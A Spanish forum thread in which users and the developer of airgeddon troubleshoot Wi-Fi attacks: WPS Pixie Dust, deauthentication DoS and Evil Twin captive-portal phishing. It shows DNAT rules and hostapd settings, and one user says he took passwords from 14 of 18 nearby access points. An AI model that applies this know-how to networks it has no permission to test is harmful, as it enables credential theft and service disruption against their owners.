Publicado por: v1s1t0r en 06-05-2019, 20:10 (Lunes)
El Pixie Dust es un tanto inestable (bueno, todo lo WPS lo es en cierta manera). Hay veces que saca el PIN solamente y otras veces todo. Como sabrás, solo afecta a unos pocos APs. Si tienes la suerte de tener uno al alcance para poderlo probar has tenido suerte! el comportamiento que ocurra ya no es cosa de airgeddon, es cosa de reaver y en el caso de bully que comentas es de bully. Lo único de todo lo que has comentado donde podemos intervenir es en guardar el PIN en el fichero de trofeo. Eso como ya se dijo, probablemente se hará para más adelante.

Gracias por el feedback.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: TJUndead en 06-05-2019, 21:06 (Lunes)
El Pixie Dust es un tanto inestable (bueno, todo lo WPS lo es en cierta manera). Hay veces que saca el PIN solamente y otras veces todo. Como sabrás, solo afecta a unos pocos APs. Si tienes la suerte de tener uno al alcance para poderlo probar has tenido suerte! el comportamiento que ocurra ya no es cosa de airgeddon, es cosa de reaver y en el caso de bully que comentas es de bully. Lo único de todo lo que has comentado donde podemos intervenir es en guardar el PIN en el fichero de trofeo. Eso como ya se dijo, probablemente se hará para más adelante.

Gracias por el feedback.

Bien, ahora lo pillo. Gracias por la aclaracion. Cuanto a lo de afectar pocos APs, aki donde vivo hoy deberé tener demasiada suerta, porque solo cerca de mi casa, de los 18 APs que escanee, de 14 pillé contraseña, y esto sin contar con el restante de la ciudad. Creo que los dichos "tecnicos" que trabajam por aki instalando internet por las casas no deben entender pifas de seguridad, porque son muchíssimo faciles de Auditar por WPS.
Ah, por cierto, hay algo que me percaté aki. De todos los APs que ataque, solo unos pocos no he logrado pillar la contraseña, o por se tratarem de equipamentos con la activacion del WPS por hardware (estos que hay que darle a un botonzito detras del router) o los que tienem chipset de Broadcom o de Atheros (incluso los de Atheros todavia trabajan con WPS version 1.0, y aun asi no van ni por cojines). No se si tiene alguna utilidad esta información, pero ahy está.

Venga, gracias y un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 06-05-2019, 21:36 (Lunes)
Ok, gracias por la info. Aunque suene a charla de padre, recuerda que esto es para usarlo con permisos sobre la red objetivo!  ;)

Y sí, lo del Pixie depende mucho de tu país, la empresa de telecomunicaciones los routers que ponga y demás. Saludos!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: radoman29 en 19-05-2019, 11:10 (Domingo)
¿Para cuando estará disponible la siguiente release (9.20) ?

gracias por tu gran trabajo v1s1t0r

 >:( >:( >:( >:( >:( >:( >:( >:( >:(
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 19-05-2019, 14:37 (Domingo)
Si realmente ya está, lo que pasa es que los traductores tardan mucho... pero si la quieres probar y usar, tan facil como hacer un git clone de la rama dev del github y ya la podrías usar. git clone -b dev https://github.com/v1s1t0r1sh3r3/airgeddon.git
Título: Re:Script multiuso en bash, airgeddon
Publicado por: TJUndead en 25-05-2019, 22:40 (Sábado)
Si realmente ya está, lo que pasa es que los traductores tardan mucho... pero si la quieres probar y usar, tan facil como hacer un git clone de la rama dev del github y ya la podrías usar. git clone -b dev https://github.com/v1s1t0r1sh3r3/airgeddon.git

Oye, si te hace falta traductor para el português, dime-lo.

Y vuelvo a preguntar sobre lo del salvado de ficheros con contraseñas del ataque por WPS. Me lo habias dicho que se puede cambiar (no me habia percatado del texto en el script que lo aclara), pero lo que estaba pensando la primera vez que pregunte era acerca del cambio de local se podria ser permanente. Porque por lo menos en las versiones 9.10 y 9.11, si se puede cambiar el local de "/root/wps_captured_key-ababababababa.txt" para "/home/user/wps_captured_key-ababababababa.txt" (un ejemplo), pero el cambio no es permanente, asi que cuando haga otro ataque, tendre que digitar toda la nueva dirección otra vez. Creo que la primera vez que pregunté acerca de esto, no fui muy claro.
Se puede hacer este cambio de forma permanente? Si no hay manera, no hay problemas, pero a mi me vendria de maravilla.

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 25-05-2019, 22:46 (Sábado)
Lo siento, ese cambio no se puede hacer  :-\

Aprovecho para comentar que hoy ha salido la versión 9.20 con el tema de tmux como alternativa a xterm

@USUARIONUEVO... solo hay que añadir una dependencia más... como essential tool, que sería tmux. No hay ficheros nuevos ni ha cambiado la estructura del script.

P.D. Grcias por el ofrecimiento para la traducción al portugués. De momento tenemos traductor. Si algún día me falla te aviso.

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 25-05-2019, 22:59 (Sábado)
Lo siento, ese cambio no se puede hacer  :-\

Aprovecho para comentar que hoy ha salido la versión 9.20 con el tema de tmux como alternativa a xterm

@USUARIONUEVO... solo hay que añadir una dependencia más... como essential tool, que sería tmux. No hay ficheros nuevos ni ha cambiado la estructura del script.

P.D. Grcias por el ofrecimiento para la traducción al portugués. De momento tenemos traductor. Si algún día me falla te aviso.

Saludos.

tmux ya venia en la distro ;=)
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 25-05-2019, 23:00 (Sábado)
perfect pues!!!  ;D ;D cierto, ni me acordaba macho....
Título: Re:Script multiuso en bash, airgeddon
Publicado por: TJUndead en 26-05-2019, 18:32 (Domingo)
Lo siento, ese cambio no se puede hacer  :-\

Aprovecho para comentar que hoy ha salido la versión 9.20 con el tema de tmux como alternativa a xterm

@USUARIONUEVO... solo hay que añadir una dependencia más... como essential tool, que sería tmux. No hay ficheros nuevos ni ha cambiado la estructura del script.

P.D. Grcias por el ofrecimiento para la traducción al portugués. De momento tenemos traductor. Si algún día me falla te aviso.

Saludos.

Por lo de la traducción, si te hace falta, inglês, español y tcheco aká tambien. ^_~

Hubo alguna alteración en la versión 9.20 final en relación con la dev?

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 26-05-2019, 18:43 (Domingo)
Algunas traducciones y poco más... también está implementado el WPS null pin attack.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: elmenda en 01-06-2019, 03:56 (Sábado)
Hola v1s1t0r, lo primero agradecerte tu esfuerzo y dedicacion, me gustaria plantearte una duda.

Cuando inicio el Evil Twin Atack en modo portal Cautivo y una vez el Handshake capturado me aparecen estas lineas de error:

 

Se ha establecido el idioma del portal cautivo

Todos los parámetros y requerimientos están listos. Va a comenzar el ataque. Se abrirán múltiples ventanas, no cierres ninguna. Cuando quieras parar el ataque pulsa [Enter] en esta ventana y el script cerrará automáticamente todo
Pulsa la tecla [Enter] para continuar...

Esta interfaz ha cambiado su nombre al ponerse en modo managed. Se ha seleccionado automáticamente


<cmdline>:1:54-55: Error: syntax error, unexpected to
add rule ip nat PREROUTING tcp dport 80 counter dnat to 192.168.1.1:80
 


<cmdline>:1:55-56: Error: syntax error, unexpected to
add rule ip nat PREROUTING tcp dport 443 counter dnat to 192.168.1.1:443


Si bien el ataque se inicia con normalidad y el usuario llega a conectarse sin intento alguno.
Añado que estoy probando la ultima version que tienes en Github y en modo live no instalado en el Hd.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 01-06-2019, 11:17 (Sábado)
Que raro... igual tienes algún problema con tus nftables... prueba a configurar en el fichero .airgeddonrc y forzar que use las antiguas iptables en lugar de las nuevas. A mi me va perfecto y a todos los que lo hemos probado en distintas distros tanto con nftables como con iptables... en Wifislax, en Parrot, Kali, etc... pero bueno, como te decía, prueba a poner la opción AIRGEDDON_FORCE_IPTABLES con true , seguro que así te funciona bien.

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: elmenda en 01-06-2019, 19:12 (Sábado)
Que raro... igual tienes algún problema con tus nftables... prueba a configurar en el fichero .airgeddonrc y forzar que use las antiguas iptables en lugar de las nuevas. A mi me va perfecto y a todos los que lo hemos probado en distintas distros tanto con nftables como con iptables... en Wifislax, en Parrot, Kali, etc... pero bueno, como te decía, prueba a poner la opción AIRGEDDON_FORCE_IPTABLES con true , seguro que así te funciona bien.

Saludos.

Efectivamente, modificando el fichero .airgeddonrc (no sabia que aparece  oculto en wifislax no asi en Windows 10) con las indicaciones que me has dado el problema ha sido subsanado y el ataque se inicia sin esos errores.

Muchisimas gracias.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: elmenda en 05-06-2019, 05:49 (Miércoles)
Ya que sigo investigando me gustaria hacerte otra pregunta v1s1t0r:

Cuando en el modo Evil Twin Atack aparece en la pagina del AP el mensaje Timer deuth remove significa que el ataque ha terminado de manera frustada y no reanuda de manera automatica o es necesario esperar porque el mismo sigue en curso?

Muchas gracias.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 05-06-2019, 07:08 (Miércoles)
No he visto ese mensaje en mi vida.... ¿en la página del AP? entiendo que de todas las ventanitas que se abren te refieres a la que crea el AP arriba a la izquierda del todo no?? es decir, la del hostapd... pues si eso es así, mal asunto! esa página se debería que dar en AP ENABLED. si no es eso, pon un pantallazo o especifica un poco más porfa.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: elmenda en 05-06-2019, 16:12 (Miércoles)
No he visto ese mensaje en mi vida.... ¿en la página del AP? entiendo que de todas las ventanitas que se abren te refieres a la que crea el AP arriba a la izquierda del todo no?? es decir, la del hostapd... pues si eso es así, mal asunto! esa página se debería que dar en AP ENABLED. si no es eso, pon un pantallazo o especifica un poco más porfa.

Se abren todas, en cuanto el mensaje vuelva a aparecerme te hago un pantallazo y lo subo al foro  ;) ;) ;)
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 05-06-2019, 21:59 (Miércoles)
en cuanto vuelva a aparecer??? entiendo entonces que no es siempre... pues ahí ya no se que decirte... puede ser algo puntual de la tarjeta que se haya quedado frita. A mi siempre que me pasa alguna cosa rara, la desconecto y la vuelvo a conectar. A veces con tanto cambio de modo y los DoS y demás, se quedan un poco pilladas... pero vamos que le pasa a todas.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: elmenda en 06-06-2019, 06:34 (Jueves)
Me refiero a que aparece practicamente siempre en los ataques Evil Twin portal Cautivo pero hoy he comprobado que sigue el ataque, aqui tienes la imagen, perdonad por los tachones un tanto cutres que he realizado con Paint

(https://imx.to/u/i/2019/06/06/227xjv.png)
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 06-06-2019, 08:44 (Jueves)
Ahhh pero eso está ok. Son mensajes del RADIUS. Imagino que se desconecta por tiempo el cliente. Además como bien dices y puedes comprobar, el ataque sigue lanzado... solo son mensajes de control pero a tí lo que te interesa aparece en la ventana de control de airgeddon (la de arriba a la derecha). Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: elmenda en 06-06-2019, 16:13 (Jueves)
Muchas gracias  ;) ;) ;)
Título: Re:Script multiuso en bash, airgeddon
Publicado por: crash en 06-06-2019, 21:09 (Jueves)
segun leo en la captura se debe a inactividad. en los dos últimos mensajes lo pone.
un saludo @v1s1t0r
Título: Re:Script multiuso en bash, airgeddon
Publicado por: Meg@Soft en 14-06-2019, 22:38 (Viernes)
Hola @v1s1t0r,

 He intentado actualizar el Airgeddon de la versión que viene con el Wifislax64 2.0. Lo ejecuté conectado a internet, hizo la comprobación, detectó que tenía internet y que estaba desactualizado, comenzó a descargarlo y despúes dió un error. Se cerró el script y luego no pude abrirlo más. Hice lo que pude con mis pocos conocimientos para recuperarlo y no logé arreglarlo. Terminé desinstalando el paquete.

 Probé a ver si lo podía instalar otra vez desde Github pero no se cómo se hace y solo logro descargar la carpeta con el script, desde ahí lo puedo ejecutar, pero no se encuentra instalado en mi Wifislax.

 Perdona si soy un tanto analfabeto en esto que debe ser una estupidez muy sencilla, pero, me podrías explicar cómo puedo volver a tener instalado el Airgeddon en mi Wifislax.

 Salu2 y muchas gracias por tu atención...
Título: Re:Script multiuso en bash, airgeddon
Publicado por: crash en 15-06-2019, 02:19 (Sábado)
está es la ruta, donde tienes que tener el script.

Código: [Seleccionar]
/usr/bin/
(https://oi1293.photobucket.com/albums/b587/crash_caos/Captura%20de%20pantalla_2019-06-15_02-14-48_zpswo3wzprt.png)
Título: Re:Script multiuso en bash, airgeddon
Publicado por: Meg@Soft en 15-06-2019, 06:48 (Sábado)
está es la ruta, donde tienes que tener el script.

Código: [Seleccionar]
/usr/bin/
(https://oi1293.photobucket.com/albums/b587/crash_caos/Captura%20de%20pantalla_2019-06-15_02-14-48_zpswo3wzprt.png)

Muchas gracias por tu respuesta, lo copié a esa ruta y ya está funcionando OK, ya lo puedo ejecutar desde el acceso directo que tenía en el escritorio, aunque no me sale en el menú de aplicaciones, pero eso ya no me interesa mucho.

Cuando el script verifica si están instaladas las herramientas opcionales me pone que no está instalado hostapd-wpe. Instalé hostapd 2.7 que subió USUARIONUEVO y sigue poniendo lo mismo. Alguna idea de por q pasa eso. Salu2.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: conc@ en 24-07-2019, 12:21 (Miércoles)
Hola tengo una duda que haber si me lo podeis ai necesitais mas info clarar.
Yo realizo el ataque evil twin con portal cautivo en mi propia red. en todos los scripts que ya logre solucionar los que me daban error ahora todo esta conectado y corriendo .
Y por ejemplo yo la prueba la hice conectando un samsung s8 solo a wifi, pero me encuentro que airgeddon no me "tira" o desconecta la wifi real que estoy clonando.
Si yo pruebo a conectar a esa wifii ya me sale cliente conectado pero......... por ningun lado me sale un mensaje o ventana el cual me pida que ponga la key. No se si es por el movil que utilizo o no corre bien algo.
A ver si me podeis decir algo. Si necesitais mas info decirlo.
Es que no veo por ejemplo que me actue como linset que todo esto si lo hacia.
Soy yo? el movil? el pc? la instalacion ?quien sabe......
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 24-07-2019, 13:26 (Miércoles)
Son cosas distintas. Una cosa es que el DoS consiga tirarte de la red real y otra cosa es que al entrar en la red falsa te salga automáticamente la detección del portal cautivo.

Para la primera no se que decirte, el DoS es una cosa muy inexacta... lo que le funciona a unos, no le funciona a otros... depende de mil factores... el punto de acceso objetivo, el cliente al que intentamos tirar, la potencia que tengamos y la distancia al AP, etc... por ejemplo el aireplay-ng suele funcionar muy bien contra clientes Android. Se suelen caer bastante rápido. Es lo que te recomendaría que usases para intentar tirar a un móvil Samsung que entiendo que es Android. Tampoco especificas si estás usando mdk3, mdk4, que versión de airgeddon, etc etc.... pero bueno.

Por otra parte, cuando conectas a la red falsa debería aparecerte un mensaje para que hicieras login en el portal cautivo. Lo acabo de probar con mi movil y funciona perfectamente. También lo he probado con un pc. Te digo lo mismo, vas a tener que concretar más.... versión, etc etc... datos datos y mas datos o no podremos ayudarte. Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: conc@ en 29-07-2019, 01:48 (Lunes)
Uff gracias v1s1tor pero creo que toqueteare mas a ver que consigo . Jajajajaa
Título: Re:Script multiuso en bash, airgeddon
Publicado por: neron25 en 06-08-2019, 22:50 (Martes)
Hola amigos, ante todo decir que me alucina este script, enhorabuena y gracias v1s1t0r. La parte que me interesa ahora mismo y más estoy probando es el Evil Twin Portal Cautivo. Lo corro en kali linux dentro de virtualbox, tengo 2 tarjetas ALFA, la AWUS036H y la AWUS036ACH, pues bién, casi todas las veces que llego a la última fase que se abren las 4 ventanas, en la del AP me da error, (alguna vez que otra lo he visto en ENABLED) pero rara vez. El error en concreto es como que trata de cargar un driver nl80211 que no corresponde al de mis tarjetas. Adjunto captura, agradecería un poco de ayuda de como solventar esto, muchas gracias.
(https://i.ibb.co/gtYbg77/IMG-20190806-224519.jpg)
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 12-08-2019, 23:07 (Lunes)
Hola, hoy hemos liberado la versión 9.21 de airgeddon con unos cuantos fixes, la posibilidad de crear certificados personalizados para los ataques enterprise y alguna cosilla más como la nueva opción retro-compatible para que puedas elegir si usar mdk4 o mdk3.

@USUARIONUEVO, comentarte un par de cambios estructurales poco importantes.... solo que el fichero de licencias ya no se llama LICENSE.md, ahora es LICENSE debido a unos cambios en github. E incluir las dos dependencias (mdk3 y openssl). Sí, tiene mdk3 y mdk4 como dependencias opcionales.

@neron25, respecto a tu problema... no se que decirte, solo que pruebes a lanzar hostapd sin airgeddon a ver si lo consigues hacer funcionar... crea un fichero hostapd.conf pequeñito con algo así suponiendo que tu tarjeta sea wlan0:

interface=wlan0
driver=nl80211
ssid=test
bssid=00:00:00:03:00:11
channel=1

Esa tarjeta wlan0 no la pongas en monitor, déjala en managed para la prueba. Luego prueba a matar Network Manager... con el comando: airmon-ng check kill

Una vez tengas el fichero creado, la tarjeta lista y network manager caput, prueba a lanzar hostapd con un sencillo comando: hostapd /la/ruta/a/tu/fichero/de/config/de/pruebas/hostapd.conf

Hasta que no consigas que eso te funcione, tampoco lo hará en airgeddon. Y si no te funciona así, es que algo hay mal con algún driver. Te diría que probases otra distro como Wifislax, aunque sea con un cd en modo Live para probar.

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: neron25 en 14-08-2019, 23:02 (Miércoles)

@neron25, respecto a tu problema... no se que decirte, solo que pruebes a lanzar hostapd sin airgeddon a ver si lo consigues hacer funcionar... crea un fichero hostapd.conf pequeñito con algo así suponiendo que tu tarjeta sea wlan0:

interface=wlan0
driver=nl80211
ssid=test
bssid=00:00:00:03:00:11
channel=1

Esa tarjeta wlan0 no la pongas en monitor, déjala en managed para la prueba. Luego prueba a matar Network Manager... con el comando: airmon-ng check kill

Una vez tengas el fichero creado, la tarjeta lista y network manager caput, prueba a lanzar hostapd con un sencillo comando: hostapd /la/ruta/a/tu/fichero/de/config/de/pruebas/hostapd.conf

Hasta que no consigas que eso te funcione, tampoco lo hará en airgeddon. Y si no te funciona así, es que algo hay mal con algún driver. Te diría que probases otra distro como Wifislax, aunque sea con un cd en modo Live para probar.

Saludos.

Buenas y muchas gracias por tu ayuda. He probado lo que me dices y parece que funciona:
Using interface wlan0 with hwaddr xxxxxx and ssid "test"
wlan0: interface state UNINITIALIZED->ENABLED
wlan0: AP-ENABLED


Pero cuando lo lanzo desde Airgeddon sigue el mismo error. Por cierto en driver no tendría que poner el driver de la AWUS036ACH?? ese igual lo está cogiendo de la wifi del portatil interna, pero he probado a cambiarlo por rtl8812AU que es el de la ALFA y me da driver error.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 15-08-2019, 22:20 (Jueves)
No, lo del driver está perfecto así. Te está cogiendo wlan0 con la tarjeta que sea esa... si ves que la wlan0 es la interna pues cambiala por wlan1 o como se llame tu tarjeta que las puedes ver haciendo iwconfig.

Eso tiene que funcionar, no se que decirte porque está más que probado.  ???
Título: Re:Script multiuso en bash, airgeddon
Publicado por: Enol321 en 26-08-2019, 12:42 (Lunes)
Lo 1º maximo respeto y admiración por el trabajo despues comentar alguna cosas positivas y otras constructivas ...Yo lo estoy provando en la version 7.11 q es la version q sale en w64 1.1 positivas tiene multiples ataques no solo es Mdk3 interesante con Aireplay pero el 3 tipo de ataque  no se q wps confusion o algo asi cuando lo activas en mi version no emite la red clon por lo cual tiene q parar y volver los otros dos mas  cosas positivas como todos los evil twin con Mdk3 en este se puede BLOQUEAR 2 RUOTER CON 2 MAC DISTINTAS.en los otros hay q llegar mediante gestor de archivos tienes q llegar a carpeta Mdk3 pero aki en este script no existe pero hay q localizar  en otra carpeta denomina (BI TEXT )ahi esta la mac q esta bloqueando ahi tendremos q poner la 2 mac completa del segundo router cliente asi el bloqueo sera total en la pantalla del Mdk3 se vera dos mac distinta desautentificando a la vez
cosas construtivas es  cuesta conseguir segun esta este script el handshake asi q tienes q conseguirlo con otros......a veces se para el Mdk3 y no se vuelve a poner en funcionamiento sospechas de q los nuevos router son capaces de bloquear al bloqueador Mdk3 (y sabemos q la clave de los evil twin de todos es un bloqueo continuo y gran mensaje Index.)..,la pantalla de control hay q maximizarla  sobre su posción inicial una vez q empiezan a entrar macs las almacena no las borra como pasa con wifimosys se satura el espacio disponible mezcandose con los demas datos del tiempo bloqueo intentos quedando unos encima del otro quedando emborronado
la index es muy fragil para modificaciones aunq realice alguna modificacion en otros mensajes a gusto de la compañia con logotipos...hay q tener cuidado ya q rapidamente no funciona y hay q reliazar comprobaciones  par ver q sigue funcionando ,la ventana colocar contraseña y botón de enviar salen muy diminutos apenas se ven en carga movil....
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 09-09-2019, 09:55 (Lunes)
Versión v9.22 released!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: nevel86@gmail.com en 23-09-2019, 19:14 (Lunes)
Hola  buenas tardes primero q nada, felicidades muy buen script.. tengo un problema sugieren modificar el fichero.airgeddonrc poner force_ptables en true, yo ya lo modifique y me sigue sin funcionar alguna solución por cierto uso wifislax 2.0  script 9.22 y tiene instaladas todas las herramientas que pide al inicio
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 24-09-2019, 15:30 (Martes)
Hola, pues para que podamos ayudarte tendrás que dar más detalles. Dinos que error te da, o pon un pantallazo del problema. Solo nos indicas que cambias una opción y que no te funciona. ¿Debemos intuir que cambias esa opción porque tu problema está relacionado con iptables? ¿y qué problema es exactamente? ¿y te ocurre haciendo qué?  ???

Desde hace algunas versiones, airgeddon funciona con nft (del paquete nftables) por defecto, y automaticamente detecta que si no tienes comando nft pues usa las iptables. Eso lo hace sin que tengas que cambiar nada. La opción AIRGEDDON_FORCE_IPTABLES es para forzar el uso de iptables aún teniendo comando nft por si quisieses por algún motivo que se ejecutase de esta forma. Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 27-09-2019, 08:04 (Viernes)
v9.23 released
Título: Re:Script multiuso en bash, airgeddon
Publicado por: chaves en 27-09-2019, 14:40 (Viernes)
Hola a todos
Estoy probando el script y en el ataque evil me da este error

Esta interfaz ha cambiado su nombre al ponerse en modo managed. Se ha seleccionado automáticamente
<cmdline>:1:54-55: Error: syntax error, unexpected to
add rule ip nat PREROUTING tcp dport 80 counter dnat to 172.16.250.1:80
                                                     ^^
<cmdline>:1:55-56: Error: syntax error, unexpected to
add rule ip nat PREROUTING tcp dport 443 counter dnat to 172.16.250.1:80
                                                      ^^

El ataque Evil Twin ha comenzado. Pulse la tecla [Enter] en esta ventana para pararlo
Pulsa la tecla [Enter] para continuar...

el caso es que está trabajando con las 6 ventanas activas pero no genera elimina la red atacada y no genera la nueva con el mismo nombre pero libre para conectarse
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 27-09-2019, 19:44 (Viernes)
Tiene pinta de que tienes algún problema con tus nftables. Prueba a usar las iptables tradicionales. Eso se hace cambiando en el fichero de configuración ".airgeddonrc" y poniendo AIRGEDDON_FORCE_IPTABLES=true . También ayudaría saber que chipset tienes, versión de airgeddon, etc. datos, datos, datos... siempre q se busque ayuda hay que dar todos los datos posibles!

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: chaves en 27-09-2019, 21:54 (Viernes)
Se actualiza a la última versión 9.23 y wlan1 // 2.4Ghz, 5Ghz // Chipset: MediaTek Inc.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 27-09-2019, 22:10 (Viernes)
Prueba lo que te digo para forzar IPTABLES en vez de nft
Título: Re:Script multiuso en bash, airgeddon
Publicado por: chaves en 27-09-2019, 23:23 (Viernes)

Prueba lo que te digo para forzar IPTABLES en vez de nft

voy a intentarlo, pero en que ruta se encuentra el fichero .airgeddonrc ( uso un usb live wifislax )
Título: Re:Script multiuso en bash, airgeddon
Publicado por: chaves en 28-09-2019, 00:26 (Sábado)
he cambiado la linea en el fichero de la ruta /usr/share/airgeddon/.airgeddonrc
ya no da los errores, pero continua sin aparecer la wifi atacada con el mismo nombre pero libre osea que continua la red protegida
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 28-09-2019, 01:34 (Sábado)
Ya has arreglado lo del nft usando forzadamente iptables, respecto a lo otro... no se que decirte porque no me das info suficiente... errores? pantallazos? datos...

funciona a la perfección, eso sí te lo puedo decir, así que algo estarás haciendo mal. Eso seguro.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: chaves en 28-09-2019, 12:56 (Sábado)
Tras varias pruebas con dos adaptadores distintos creo que al final el problema es incompatibilidad con el chip

2.4Ghz // Chipset: Ralink Technology, Corp. RT3370

AIRGEDDON_FORCE_IPTABLES=false
-Ataque Deauth aireplay
<cmdline>:1:54-55: Error: syntax error, unexpected to
add rule ip nat PREROUTING tcp dport 80 counter dnat to 172.16.250.1:80                                                     ^^
<cmdline>:1:55-56: Error: syntax error, unexpected to
add rule ip nat PREROUTING tcp dport 443 counter dnat to 172.16.250.1:80

-desaparece mi red con protección
-aparece mi red libre
-Me conecto con el mobil y funciona el ataque


2.4Ghz, 5Ghz // Chipset: MediaTek Inc.
AIRGEDDON_FORCE_IPTABLES=false
Ataque Deauth aireplay
<cmdline>:1:54-55: Error: syntax error, unexpected to
add rule ip nat PREROUTING tcp dport 80 counter dnat to 172.16.250.1:80
                                                     ^^
<cmdline>:1:55-56: Error: syntax error, unexpected to
add rule ip nat PREROUTING tcp dport 443 counter dnat to 172.16.250.1:80

-No desaparece mi red protegida
-No aparece mi red libre

AIRGEDDON_FORCE_IPTABLES=true
Ataque Deauth aireplay
No da el error
-No desaparece mi red protegida
-No aparece mi red libre
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 29-09-2019, 11:39 (Domingo)
Bueno, lo de los errores ha quedado claro que es porque tienes algún problema con nft y que forzando iptables te funciona ok esa parte. Eso ya lo dejamos de tratar.

Respecto a lo que dices que la red legítima no desaparece.... es que la red legítima nunca desaparece. Es decir, que la denegación de servicio que se lanza hace que los clientes legítimos se caigan de la red legítima, pero no hace que la red legítima se deje de ver. Eso no se puede hacer (al menos con airgeddon) por lo que es completamente normal. En cuanto a qué clientes caen y como, es complicado... a algunos clientes les afecta un ataque de DoS mientras que a otros no les afecta. También depende del punto de acceso. No hay una regla única que funcione en todos los casos ni mucho menos. Puede que unos clientes caiga y otros no con el mismo ataque. Por eso lo que hay que hacer es probar hasta dar con lo que mejor te funcione para tu caso particular.

Respecto a lo que comentas de que no te aparece la red libre, entiendo que te refieres a la red falsa creada por airgeddon en un ataque Evil Twin. Eso no lo entiendo pues esa parte funciona ok desde hace muchas versiones. Me da la impresión de que nos falta algún dato. Tampoco he probado el chipset que tú tienes y no se si podría estar causando algún problema. Lo que te podría decir es que lo probases con otra tarjeta o que lo probases también con otro Linux (aunque sea en una máquina virtual) para descartar problemas con el hardware o ese chipset concreto.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 06-10-2019, 20:14 (Domingo)
Buenas, en airgeddon estamos liando una buena para la próxima versión. Estamos creando un sistema de plugins! para que la gente pueda hacer sus propias personalizaciones del script. Es ambicioso, pero si lo conseguimos puede ser la leche! dejo por aquí un link que explica todo lo que estamos haciendo y en qué consiste con más detalles: https://github.com/v1s1t0r1sh3r3/airgeddon/issues/308

Aprovecho para decir que hemos creado un canal de Discord para resolver dudas y ayudar a los usuarios (eso si, es un canal en el que se habla en inglés, sorry  >:D ). Dejo por aquí el link público de invitación: ####### (http://#######)

Saludos!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: conc@ en 06-10-2019, 20:29 (Domingo)
Grandes noticias y esperando esa nueva version que seguro estara mas que bien y se agradece tu labor imparable y para el canal siempre esta el amigo google translator y por supuesto puedes contar con mi pequeño apoyo para lo que pueda.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: chaves en 13-10-2019, 13:30 (Domingo)
v1s1tor, si arreglado para que no salga el error forzando iptables, pero continua sin crear la red abierta y el problema es la tarjeta pues con el modelo

2.4Ghz // Chipset: Ralink Technology, Corp. RT3370 si lo hace bien, pero con el otro que uso

2.4Ghz, 5Ghz // Chipset: MediaTek Inc. , no la genera y da un error en el módulo AP

Configuration files: /tmp/ag.hostapd.conf
nl80211: Could not configure driver mode
nl80211: deinit ifname=wlan1 disabled_11b_rates=0
nl80211: driver initialization failed
wlan1; interface state UNINITIALIZED->DISABLED
wlan1: AP-DISABLED
wlan1: CTRL-EVENT-TERMINATING
hostapd_free_hapd_data: Interface wlan1 wasn't started



Ya has arreglado lo del nft usando forzadamente iptables, respecto a lo otro... no se que decirte porque no me das info suficiente... errores? pantallazos? datos...

funciona a la perfección, eso sí te lo puedo decir, así que algo estarás haciendo mal. Eso seguro.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 13-10-2019, 14:09 (Domingo)
Pues ahí poco podemos hacer. Esa tarjeta parece que no está soportando el modo master. Pero bueno, si ya consigues que te funcione con otra perfecto!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: conc@ en 20-10-2019, 21:41 (Domingo)
@chaves ese error como bien dice v1s1t0r es que ese chip no esta soportado ni lanza el AP.

Tras trastear con varios modelos me sucedia lo mismo y lo solucione rapidamente cambiando la tarjeta. Si te es posible prueba con otra
Título: Re:Script multiuso en bash, airgeddon
Publicado por: eliasgv en 26-10-2019, 00:30 (Sábado)
Buenas noches amigos soy un poco "lerdo" en esto de instalar cosas en linux y aqui os dejo mi problema :
- Instalo Airgeddon en ubuntu mate 18.04 segun dice en tu pagina de github.co........., lo lanzo y miro TODO lo que me falta de dependencias o que aconseja el programa tener instalado.
  A buscarlo por internet, encuentro e instalo  >:( pues NO porque lo que instalo no es la version que espera airgeddon ( o como en el caso del "beef" que comentas y que dice el programa que tiene que ser "beEF" y que no encuentro por ningun lado.
- Despues de romperme los sesos durante unos dias decido eliminar ubuntu e instalar wifislax64 y  ;D.
- Decido actualizar wifislax y sus programas y  ??? ??? ??? :-X se rompen la mayoria de los vinculos asique reinstalo el wifislax de cero y a correr.
Sera maravilloso el programa cuando tengas la nueva version pero seria mejor si fuera facil encontrar e instalar dependencias y demas.

Esto no es ninguna critica a vuestro trabajo que es magnifico pero ......
Saludos
